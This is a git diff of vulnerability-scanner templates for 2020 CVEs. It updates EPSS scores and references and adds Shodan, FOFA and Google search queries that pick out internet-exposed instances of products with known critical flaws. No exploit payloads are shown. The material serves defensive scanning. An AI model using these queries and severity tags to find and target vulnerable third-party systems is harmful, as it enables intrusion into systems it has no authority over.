b/http/cves/2020/CVE-2020-2551.yaml index 58d1bf46eb..d64fd22ac7 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -14,17 +14,22 @@ info: - https://github.com/hktalent/CVE-2020-2551 - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 - https://www.oracle.com/security-alerts/cpujan2020.html + - https://github.com/neilzhang1/Chinese-Charts + - https://github.com/pjgmonteiro/Pentest-tools classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - epss-score: 0.97491 - epss-percentile: 0.99973 + epss-score: 0.97537 + epss-percentile: 0.99993 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,weblogic,rce,unauth,kev http: diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 8557d20b49..0a03ff33ee 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25540 cwe-id: CWE-22 - epss-score: 0.96711 - epss-percentile: 0.99631 + epss-score: 0.96513 + epss-percentile: 0.99597 cpe: cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 681c606c24..85a7fc395f 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-25864 cwe-id: CWE-79 epss-score: 0.00324 - epss-percentile: 0.70154 + epss-percentile: 0.70681 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 vendor: hashicorp product: consul + shodan-query: http.title:"consul by hashicorp" + fofa-query: title="consul by hashicorp" + google-query: intitle:"consul by hashicorp" tags: cve,cve2020,consul,xss,intrusive,hashicorp http: diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 4a4876eacf..31d70be1ec 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26214 cwe-id: CWE-287 - epss-score: 0.01546 - epss-percentile: 0.85739 + epss-score: 0.01324 + epss-percentile: 0.85971 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index bcad0d4ac7..a9b1045b02 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26217 cwe-id: CWE-78 epss-score: 0.97384 - epss-percentile: 0.99904 + epss-percentile: 0.99909 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 2eb92d4c72..c9e41d9290 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -20,14 +20,16 @@ info: cvss-score: 5.3 cve-id: CVE-2020-26413 cwe-id: CWE-200 - epss-score: 0.74714 - epss-percentile: 0.97878 + epss-score: 0.78637 + epss-percentile: 0.9826 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql http: diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 1125f75f3d..fcac697eaa 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: emby product: emby + shodan-query: http.title:"emby" + fofa-query: title="emby" + google-query: intitle:"emby" tags: cve2020,cve,emby,jellyfin,ssrf http: diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index e7a2ec4233..1b2c984cbc 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 - epss-score: 0.29301 - epss-percentile: 0.96779 + epss-score: 0.19944 + epss-percentile: 0.96328 cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index e6cea59742..c3ff473896 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: processwire product: processwire + shodan-query: http.html:"processwire" + fofa-query: body="processwire" tags: cve,cve2020,processwire,lfi,cms,oss http: diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 83c85522de..e311fbcca2 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-27481 cwe-id: CWE-89 - epss-score: 0.12857 - epss-percentile: 0.94961 + epss-score: 0.11692 + epss-percentile: 0.95277 cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 2b26c83f60..69fb387790 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -28,6 +28,8 @@ info: vendor: redhat product: keycloak shodan-query: "title:\"keycloak\"" + fofa-query: title="keycloak" + google-query: intitle:"keycloak" tags: cve,cve2020,keycloak,exposure http: diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 38de085046..b8714487f4 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-27866 cwe-id: CWE-288,CWE-287 - epss-score: 0.00363 - epss-percentile: 0.69495 + epss-score: 0.0045 + epss-percentile: 0.75056 cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 1ce2c00bcc..a331f1c2fb 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27982 cwe-id: CWE-79 - epss-score: 0.00178 - epss-percentile: 0.55072 + epss-score: 0.00252 + epss-percentile: 0.65095 cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: icewarp product: mail_server shodan-query: title:"icewarp" + fofa-query: title="icewarp server administration" + google-query: intitle:"icewarp server administration" tags: cve,cve2020,xss,icewarp,packetstorm http: diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index b1f11242bd..d537647c4d 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27986 cwe-id: CWE-306 - epss-score: 0.25376 - epss-percentile: 0.96582 + epss-score: 0.3688 + epss-percentile: 0.97174 cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 7d8080615c..bea963d0ad 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -21,7 +21,7 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28185 epss-score: 0.00465 - epss-percentile: 0.74945 + epss-percentile: 0.75439 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 2651659e44..cfd5a2452b 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -20,13 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28188 cwe-id: CWE-78 - epss-score: 0.97279 - epss-percentile: 0.99845 + epss-score: 0.97298 + epss-percentile: 0.99867 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: terra-master product: tos + fofa-query: '"terramaster" && header="tos"' tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index c02225fcab..76ca5cba57 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: rocket.chat product: rocket.chat + shodan-query: http.title:"rocket.chat" + fofa-query: title="rocket.chat" + google-query: intitle:"rocket.chat" tags: cve,cve2020,packetstorm,rocketchat,rocket.chat http: diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index edc2af0649..cbb4b49bd1 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -20,15 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 - epss-score: 0.96907 - epss-percentile: 0.99693 + epss-score: 0.96887 + epss-percentile: 0.99706 cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 vendor: monitorr product: monitorr + fofa-query: icon_hash="-211006074" + shodan-query: http.favicon.hash:"-211006074" tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project - variables: string: "CVE-2020-28871" diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index f08711f054..19444ba22b 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-29164 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.5782 + epss-percentile: 0.58449 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 1d68e39a0b..7fde469b2a 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -19,13 +19,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29227 - epss-score: 0.01122 - epss-percentile: 0.83087 + epss-score: 0.01244 + epss-percentile: 0.85477 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"car rental management system" + fofa-query: body="car rental management system" tags: cve,cve2020,lfi,car_rental_management_system_project,sqli http: diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 12e0d0c29b..d4742310cb 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29284 cwe-id: CWE-89 - epss-score: 0.06718 - epss-percentile: 0.93156 + epss-score: 0.14147 + epss-percentile: 0.95695 cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 0d94312140..69e589c909 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -20,16 +20,19 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29395 cwe-id: CWE-79 - epss-score: 0.05489 - epss-percentile: 0.93026 + epss-score: 0.03946 + epss-percentile: 0.91992 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: myeventon product: eventon framework: wordpress + fofa-query: wp-content/plugins/eventon/ + publicwww-query: /wp-content/plugins/eventon/ + shodan-query: http.html:/wp-content/plugins/eventon/ + google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index c99a67e7fc..014ee1b3cb 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 - epss-score: 0.96219 - epss-percentile: 0.99483 + epss-score: 0.96125 + epss-percentile: 0.995 cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: zyxel product: usg20-vpn_firmware shodan-query: title:"USG FLEX 100" + fofa-query: title="usg flex 100" + google-query: intitle:"usg flex 100" tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev http: diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 949708267e..4705cb52ef 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -23,13 +23,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-3452 cwe-id: CWE-22,CWE-20 - epss-score: 0.97531 - epss-percentile: 0.99992 - cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* + epss-score: 0.97484 + epss-percentile: 0.99971 + cpe: cpe:2.3:h:cisco:asa_5505:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cisco - product: adaptive_security_appliance_software + product: asa_5505 tags: cve,cve2020,lfi,kev,packetstorm,cisco http: diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 9628bcfd78..8ed3be85fa 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35234 cwe-id: CWE-532 - epss-score: 0.37649 - epss-percentile: 0.97105 + epss-score: 0.36584 + epss-percentile: 0.97167 cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 61077bcd15..4a58de3baa 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35338 cwe-id: CWE-798 - epss-score: 0.29702 - epss-percentile: 0.96805 + epss-score: 0.2493 + epss-percentile: 0.96665 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 264d0c25b0..dd892cf895 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -28,6 +28,7 @@ info: vendor: opentsdb product: opentsdb shodan-query: html:"OpenTSDB" + fofa-query: body="opentsdb" tags: cve,cve2020,opentsdb,rce,packetstorm http: diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 2369c12c6a..175e774e0d 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2020-35489 cwe-id: CWE-434 - epss-score: 0.88428 - epss-percentile: 0.98435 + epss-score: 0.81728 + epss-percentile: 0.98365 cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index 9a790fd208..a8c5341f0a 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-35580 cwe-id: CWE-22 epss-score: 0.01833 - epss-percentile: 0.87972 + epss-percentile: 0.88238 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 523a7bc555..6501f849b1 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35598 cwe-id: CWE-22 - epss-score: 0.11153 - epss-percentile: 0.9467 + epss-score: 0.10057 + epss-percentile: 0.94902 cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index de8226c5d2..1cbc6725b4 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35713 cwe-id: CWE-78 - epss-score: 0.96729 - epss-percentile: 0.9964 + epss-score: 0.96521 + epss-percentile: 0.99601 cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index e5df7fffc2..3c813132cc 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -13,13 +13,15 @@ info: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 - https://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/ + - https://github.com/20142995/Goby + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-35736 cwe-id: CWE-22 epss-score: 0.01204 - epss-percentile: 0.83699 + epss-percentile: 0.85176 cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 6288515981..5f3bc76f8d 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -14,13 +14,15 @@ info: - https://twitter.com/ptswarm/status/1408050644460650502 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe - https://nvd.nist.gov/vuln/detail/CVE-2020-3580 + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors + - https://github.com/r0eXpeR/supplier classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-3580 cwe-id: CWE-79 - epss-score: 0.97048 - epss-percentile: 0.99705 + epss-score: 0.97074 + epss-percentile: 0.99768 cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 6018bad026..176ff3534b 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 - epss-score: 0.78767 - epss-percentile: 0.98182 + epss-score: 0.82607 + epss-percentile: 0.98409 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: agentejo product: cockpit + shodan-query: http.favicon.hash:688609340 + fofa-query: icon_hash=688609340 tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index b0f399f261..a1583675d8 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 - epss-score: 0.77399 - epss-percentile: 0.98139 + epss-score: 0.79056 + epss-percentile: 0.98269 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: agentejo product: cockpit shodan-query: http.favicon.hash:688609340 + fofa-query: icon_hash=688609340 tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index c6b3adbfe0..9e3fd91d47 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 - epss-score: 0.75372 - epss-percentile: 0.98077 + epss-score: 0.80133 + epss-percentile: 0.98306 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: agentejo product: cockpit + shodan-query: http.favicon.hash:688609340 + fofa-query: icon_hash=688609340 tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 8136dd8f95..d1a397b88b 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index fe42828880..3413c23bbb 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -27,6 +27,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 360492a082..85e049d8b4 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index eb8c02320d..d8c4ba738a 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -27,6 +27,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 95be5d3413..46bb268528 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-36112 cwe-id: CWE-89 - epss-score: 0.40407 - epss-percentile: 0.9718 + epss-score: 0.40486 + epss-percentile: 0.97275 cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index c7eb5e666a..c92d50c413 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-36289 cwe-id: CWE-863 - epss-score: 0.91164 - epss-percentile: 0.98655 + epss-score: 0.96974 + epss-percentile: 0.99732 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index c3116b81e6..cf8a6981ad 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -28,6 +28,7 @@ info: vendor: smartstore product: smartstorenet shodan-query: http.html:'content="Smartstore' + fofa-query: body='content="smartstore' tags: cve2020,cve,redirect,smartstore http: diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index b740c5d50a..e9c731ee45 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -32,6 +32,7 @@ info: vendor: ibm product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 + fofa-query: icon_hash=-399298961 tags: cve,cve2020,ibm,xxe,disclosure http: diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index 07db650b42..059e084422 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -14,19 +14,23 @@ info: - https://www.exploit-db.com/exploits/47841 - https://phpgurukul.com/hospital-management-system-in-php/ - https://nvd.nist.gov/vuln/detail/CVE-2020-5191 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 epss-score: 0.00345 - epss-percentile: 0.68617 + epss-percentile: 0.71585 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: phpgurukul product: hospital_management_system + shodan-query: http.html:"hospital management system" + fofa-query: body="hospital management system" tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul http: diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 1c118bfc6d..d9eb58a539 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -22,13 +22,15 @@ info: cve-id: CVE-2020-5192 cwe-id: CWE-89 epss-score: 0.38401 - epss-percentile: 0.96871 + epss-percentile: 0.97221 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: phpgurukul product: hospital_management_system + shodan-query: http.html:"hospital management system" + fofa-query: body="hospital management system" tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index f5b538a8f4..9d5fec6868 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -20,12 +20,14 @@ info: cve-id: CVE-2020-5284 cwe-id: CWE-22,CWE-23 epss-score: 0.00213 - epss-percentile: 0.58675 + epss-percentile: 0.5933 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js + shodan-query: http.html:"/_next/static" + fofa-query: body="/_next/static" tags: cve,cve2020,nextjs,lfi,zeit http: diff --git a/http/cves/2020/CVE-2020-5410.yaml 